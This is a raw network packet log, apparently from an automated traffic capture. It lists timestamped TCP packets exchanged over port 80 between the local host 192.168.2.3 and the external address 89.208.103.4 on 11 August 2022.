Aug 11, 2022 06:57:07.552141905 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552161932 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552170992 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552185059 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552205086 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552206993 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552227020 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552247047 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552248955 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552268028 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552277088 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552289963 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552299976 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552310944 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552330971 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552335024 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552351952 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552371025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552371025 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552393913 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552396059 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552416086 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552434921 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552436113 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552458048 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552467108 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552479029 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552499056 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552508116 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552520037 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552520037 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552541018 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552551985 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552562952 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552576065 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552583933 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552603960 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552603006 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552623987 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552624941 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552645922 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552654982 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552665949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552687883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552694082 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552710056 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552720070 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552731037 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552752972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552757978 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552772999 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552787066 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552793980 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552814007 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552815914 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552834988 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552855968 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552864075 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552875996 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552894115 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552897930 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552928925 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.552946091 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.552968025 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.553802013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.553823948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.553841114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.553855896 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.553872108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.553901911 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.553953886 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.554912090 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.554990053 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.555394888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.555425882 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.555453062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.555463076 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.555480003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.555486917 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.555507898 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.555512905 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.555531979 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.555546999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.555907011 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.555936098 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.555963039 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.555965900 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.555990934 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.555993080 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.556016922 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.556018114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.556032896 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.556050062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.556077003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.556077957 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.556102037 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.556104898 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.556123018 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.556150913 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.557075024 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.557101011 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.557126999 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.557140112 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.557156086 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.557157993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.557173014 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.557185888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.557209015 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.557214022 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.557231903 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.557241917 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.557270050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.557277918 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.557297945 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.557312965 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.559221029 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.559248924 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.559274912 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.559293032 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.559302092 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.559329987 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.559334993 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.559360027 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.559376955 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.559377909 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.559406042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.559427977 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.559434891 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.559448957 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.559462070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.559498072 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.559509993 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.560208082 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.560235023 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.560261011 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.560261965 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.560280085 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.560305119 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.561305046 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.561333895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.561358929 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.561372995 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.561386108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.561397076 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.561417103 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.561419010 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.561443090 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.561446905 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.561459064 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.561470985 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.561501026 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.561517000 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.562199116 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.562226057 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.562252045 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.562278032 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.562278986 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.562304974 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.562306881 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.562324047 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.562361956 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.565905094 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.565992117 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.566935062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.566965103 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.566992044 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.567019939 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.567023993 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.567049026 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.567049026 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.567075968 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.567079067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.567107916 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.567109108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.567135096 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.567153931 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.570106983 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.570137024 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.570166111 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.570188999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.570194006 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.570200920 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.570218086 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.570235968 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.570262909 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.570297003 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.571126938 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.571158886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.571186066 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.571202040 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.571216106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.571224928 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.571230888 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.571249008 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.571275949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.571278095 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.571299076 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.571305990 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.571329117 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.571371078 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.576411009 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.576455116 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.576483965 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.576497078 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.576529980 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.576535940 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.576550007 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.576576948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.576589108 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.576617002 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.576653957 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.576663971 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.577434063 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.577474117 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.577510118 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.577514887 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.577528000 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.577555895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.577567101 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.577595949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.577610016 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.577635050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.577651024 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.577672958 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.577682018 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.577713013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.577732086 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.577760935 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.578480005 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.578520060 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.578556061 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.578557014 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.578568935 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.578597069 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.578612089 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.578635931 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.578650951 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.578675032 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.578690052 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.578715086 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.578722000 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.578771114 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.578994036 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.579035044 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.579058886 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.579073906 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.579087973 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.579112053 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.579135895 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.579150915 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.579161882 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.579191923 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.579204082 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.579232931 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.579242945 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.579273939 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.579291105 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.579320908 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.585299015 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.585366964 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.585798979 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.585839987 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.585879087 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.585886955 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.585911036 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.585917950 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.585948944 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.585957050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.585982084 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.585995913 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.586014986 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.586034060 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.586049080 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.586075068 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.586091042 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.586112976 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.586124897 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.586153030 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.586184025 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.586193085 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.586215973 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.586231947 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.586257935 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.586287975 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.594312906 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.594356060 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.594392061 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.594396114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.594414949 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.594439030 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.594446898 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.594477892 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.594492912 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.594517946 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.594525099 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.594559908 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.594573021 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.594599009 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.594608068 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.594639063 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.594654083 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.594677925 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.594683886 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.594715118 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.594739914 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.594753981 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.594758987 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.594800949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.594808102 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.594822884 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.594857931 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.594862938 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.594870090 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.594901085 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.594914913 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.594939947 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.594949007 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.594979048 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.594989061 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.595019102 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.595031023 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.595062017 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.595071077 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.595112085 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.595784903 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.595824003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.595859051 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.595861912 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.595877886 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.595902920 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.595916033 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:07.595941067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:07.595957994 CEST	49736	80	192.168.2.3	89.208.103.4
